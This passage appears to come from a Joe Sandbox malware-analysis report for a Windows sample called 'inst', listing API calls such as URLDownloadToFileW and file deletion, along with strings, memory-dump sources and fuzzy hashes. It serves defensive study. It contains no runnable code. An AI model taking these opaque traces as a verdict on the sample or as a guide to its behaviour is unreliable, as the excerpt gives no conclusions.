                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,0000002C), ref: 00AD034A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DriveExistsFileH_prolog3_PathType
                                                                                                                                                                                                                      • String ID: A:\
                                                                                                                                                                                                                      • API String ID: 2710305776-3379428675
                                                                                                                                                                                                                      • Opcode ID: a36b294e7ecdc55457eb50cce64d4f40aa3b714e188c2e509fc90d4c08fc55f7
                                                                                                                                                                                                                      • Instruction ID: c44a0a8b28cdaad30b6d10a650468aa41f55794aacf34769e36a6b34aca4ba6f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a36b294e7ecdc55457eb50cce64d4f40aa3b714e188c2e509fc90d4c08fc55f7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A4194389121118ACF28ABA5C5ADFFE73A1EF52310F94402FE683D7355DB308D82C665
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3__memcmp_memset
                                                                                                                                                                                                                      • String ID: [360signdata]sign=
                                                                                                                                                                                                                      • API String ID: 1379577869-1737267629
                                                                                                                                                                                                                      • Opcode ID: ab119ca464d7f7482107520105a23d2930204b47b97ad4ef7b72dca0d867056d
                                                                                                                                                                                                                      • Instruction ID: 56a4c5ddb8197b80acb2d71cd39375e96eafa6c1bd8e98448cf9185743541bfd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab119ca464d7f7482107520105a23d2930204b47b97ad4ef7b72dca0d867056d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E419271D046589BCB20EF62CD41BEE73B8BF24395F6409E9E509A3181E774AE848F50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AA854B
                                                                                                                                                                                                                        • Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560
                                                                                                                                                                                                                        • Part of subcall function 00A8A8EB: _wcsnlen.LIBCMT ref: 00A8A91D
                                                                                                                                                                                                                        • Part of subcall function 00ADE037: _memset.LIBCMT ref: 00ADE069
                                                                                                                                                                                                                        • Part of subcall function 00ADE037: GetTempPathW.KERNEL32(00000104,?,00B5CDA4,?,?), ref: 00ADE07D
                                                                                                                                                                                                                        • Part of subcall function 00ADE037: _memset.LIBCMT ref: 00ADE08D
                                                                                                                                                                                                                        • Part of subcall function 00ADE037: GetTempFileNameW.KERNEL32(?,00AA85B6,00000000,?,?,?,?,?,?,?), ref: 00ADE0A6
                                                                                                                                                                                                                        • Part of subcall function 00ADE037: DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00ADE0B3
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00AA85F7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileTemp_memset$CountDeleteH_prolog3NamePathTick_malloc_wcsnlen
                                                                                                                                                                                                                      • String ID: !@tmpini%^&$?rd=%d
                                                                                                                                                                                                                      • API String ID: 431327915-4013382025
                                                                                                                                                                                                                      • Opcode ID: 592a7589c853493290e41feaef33b60666b0a3069dab7cc40e74f91fdb39a4bb
                                                                                                                                                                                                                      • Instruction ID: c0982b8ead1b3679f9cac68c6926d7e207fafb5b3911d71fdc15e7cb2fdd8539
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 592a7589c853493290e41feaef33b60666b0a3069dab7cc40e74f91fdb39a4bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE219A72A002099BDB25F7B4CE42BFEB3B9AF44321F544459F21AA72C2CF7469048725
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AB30AA
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,0000019F,00000078,00000006,0000012A,PNG,00000018), ref: 00AB30E5
                                                                                                                                                                                                                        • Part of subcall function 00A9E185: GetDC.USER32(?), ref: 00A9E193
                                                                                                                                                                                                                        • Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CompatibleCreateH_prolog3ObjectSelectViewportWindow_malloc
                                                                                                                                                                                                                      • String ID: PNG$x
                                                                                                                                                                                                                      • API String ID: 2666613662-1595511861
                                                                                                                                                                                                                      • Opcode ID: db39466c4ea878768511703d909ad4be959cff7531c985f06a976587dc23f370
                                                                                                                                                                                                                      • Instruction ID: b47148b93c2b832d1a0889b004b2fbc20c91fd6a67dccc1b53233a847fd37ae2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db39466c4ea878768511703d909ad4be959cff7531c985f06a976587dc23f370
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1911B230A002089FDF14DFA4CE86AFEB6F9AF04710F50416DF106AB2D2DB755E019B11
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00A7611A,?,00000000,?), ref: 00A750BC
                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00A7611A,?,00000000,?), ref: 00A7515B
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,00A7611A,?,00000000,?), ref: 00A75177
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00A7521E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$PointerReadSize_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1834740430-0
                                                                                                                                                                                                                      • Opcode ID: 6149ebcb1e2e7cd525fcb91d0630c50d41b6075e1b43a05099c53adc0572d7b3
                                                                                                                                                                                                                      • Instruction ID: 9d25fba85f45c297186305b4580f21f4dd104c8fddc3035de9b15097b14f7ab3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6149ebcb1e2e7cd525fcb91d0630c50d41b6075e1b43a05099c53adc0572d7b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8751AF71A087019BD714DF29DC80B6BB7E4FB88750F94CA2CF88DD7241E674E9458B92
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentDeleteFileH_prolog3Thread__wcsicoll
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3249433508-0
                                                                                                                                                                                                                      • Opcode ID: 6842a85f55db5f85c2fecdd42245f01391aed496780544cc64026afa034bf0be
                                                                                                                                                                                                                      • Instruction ID: 514545b5aa8363881914c96721db53d45429037618c3044f9b5d65bf72c32fa9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6842a85f55db5f85c2fecdd42245f01391aed496780544cc64026afa034bf0be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2517B31910209DBDF19FFA0C982AEEBBF1FF18311F10042DF946A6192DB709946DB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ADE69E
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00B3E544,0000005C,00000008,00ADE838,?,?,0000002C), ref: 00ADE75E
                                                                                                                                                                                                                      • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,0000002C), ref: 00ADE76B
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0000002C), ref: 00ADE7B5
                                                                                                                                                                                                                        • Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorException@8ExistsFileH_prolog3LastPathThrow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3549841302-0
                                                                                                                                                                                                                      • Opcode ID: b1f73e590d266820c9ffbffb2a6bc855df9c465d59573d3e314e2a22737a00ec
                                                                                                                                                                                                                      • Instruction ID: 767aedc2810794adfc8614a6bb2c6379c3949d51c611d094aca8ab02e501dfd9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1f73e590d266820c9ffbffb2a6bc855df9c465d59573d3e314e2a22737a00ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B231D0305011159ACB68FB64CA99AFE77B1EF21301F50852AF51BEF395DB309941CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00ADA689
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00ADA69E
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00ADA6CA
                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00ADA6DF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDelete
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 488333989-0
                                                                                                                                                                                                                      • Opcode ID: 9df74d6df8c38684cc40692aa2d2dae8840134099c1a15788959b05642c4d1e8
                                                                                                                                                                                                                      • Instruction ID: af07f88bcbcfb763071eab3301458931b60468f1125d0c332310ec1323c3de95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9df74d6df8c38684cc40692aa2d2dae8840134099c1a15788959b05642c4d1e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731E37690010AEFCF11DFA4CD41DEE7BBAEF58304F00411AF916A2261DB31DA66DB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A88116
                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00A8813D
                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00A88158
                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00A8815F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1533324876-0
                                                                                                                                                                                                                      • Opcode ID: 8f462308a7242898e83a86f571a9be9f10ab811776b4f667968460429ce61df1
                                                                                                                                                                                                                      • Instruction ID: 7fa67e201ed6bf7f66e34fa8a81ae160d691b43eea3c2c6f1b5ac36a4fe3fae0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f462308a7242898e83a86f571a9be9f10ab811776b4f667968460429ce61df1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01927121560A6F57207FA58CCC9BFB7ACEF563997100629F112C2010FF68CC038BA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00AB6871
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AB68A0
                                                                                                                                                                                                                      • URLDownloadToCacheFileW.URLMON(00000000,?,?,00000104,00000000,00000000), ref: 00AB68B8
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?), ref: 00AB68C8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Download$CacheDelete_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1835763934-0
                                                                                                                                                                                                                      • Opcode ID: 451f133b9410749cc331042312c58f288a60435d932bfb4d52ddd7b8e8ff16bb
                                                                                                                                                                                                                      • Instruction ID: 017396f7344ae50b18f2638d4b1b884434f822f171621997e696767d348844f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 451f133b9410749cc331042312c58f288a60435d932bfb4d52ddd7b8e8ff16bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED01D671511128AACB20EBA68D05EFFBBFCDF49B54F000061B508D3042E678CE81C6E5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C6923D1: __wfsopen.LIBCMT ref: 6C6923DE
                                                                                                                                                                                                                      • __filelength.LIBCMT ref: 6C655B7E
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 6C655B8D
                                                                                                                                                                                                                        • Part of subcall function 6C68D47E: __FF_MSGBANNER.LIBCMT ref: 6C68D4A1
                                                                                                                                                                                                                        • Part of subcall function 6C68D47E: __NMSG_WRITE.LIBCMT ref: 6C68D4A8
                                                                                                                                                                                                                        • Part of subcall function 6C68D47E: RtlAllocateHeap.NTDLL(00000000,6C68DF44,?,?,?,?,6C68DF53,?), ref: 6C68D4F5
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6C655BA1
                                                                                                                                                                                                                      • __fread_nolock.LIBCMT ref: 6C655BAB
                                                                                                                                                                                                                        • Part of subcall function 6C68D548: __lock.LIBCMT ref: 6C68D566
                                                                                                                                                                                                                        • Part of subcall function 6C68D548: ___sbh_find_block.LIBCMT ref: 6C68D571
                                                                                                                                                                                                                        • Part of subcall function 6C68D548: ___sbh_free_block.LIBCMT ref: 6C68D580
                                                                                                                                                                                                                        • Part of subcall function 6C68D548: HeapFree.KERNEL32(00000000,6C68DF53,6C6D5220,0000000C,6C697673,00000000,6C6D5648,0000000C,6C6976AD,6C68DF53,?,?,6C69CAFF,00000004,6C6D57F8,0000000C), ref: 6C68D5B0
                                                                                                                                                                                                                        • Part of subcall function 6C68D548: GetLastError.KERNEL32(?,6C69CAFF,00000004,6C6D57F8,0000000C,6C695FE1,6C68DF53,?,00000000,00000000,00000000,?,6C69AD80,00000001,00000214), ref: 6C68D5C1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__filelength__fread_nolock__lock__wfsopen_malloc_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 82526466-0
                                                                                                                                                                                                                      • Opcode ID: aa806175e8b1910d399f12bbef8701841ce524835572d25ef3fe34fdad2e64d7
                                                                                                                                                                                                                      • Instruction ID: f25f1a43af75c5d1dc8da3503119df7fba03abf0c26afbf7cdd8a23b0aca2fae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa806175e8b1910d399f12bbef8701841ce524835572d25ef3fe34fdad2e64d7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1301AC725053197FD7149B65DC89EDF3B5CDF42368F20402BF90096A41DB71EA1486BD
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A91F0D
                                                                                                                                                                                                                        • Part of subcall function 00A8DEB6: GetFileAttributesW.KERNEL32(?), ref: 00A8DEBA
                                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 00A91F43
                                                                                                                                                                                                                        • Part of subcall function 00A91F06: CreateDirectoryW.KERNEL32(?,00000000), ref: 00A91F75
                                                                                                                                                                                                                        • Part of subcall function 00A91F06: GetLastError.KERNEL32 ref: 00A91F7F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
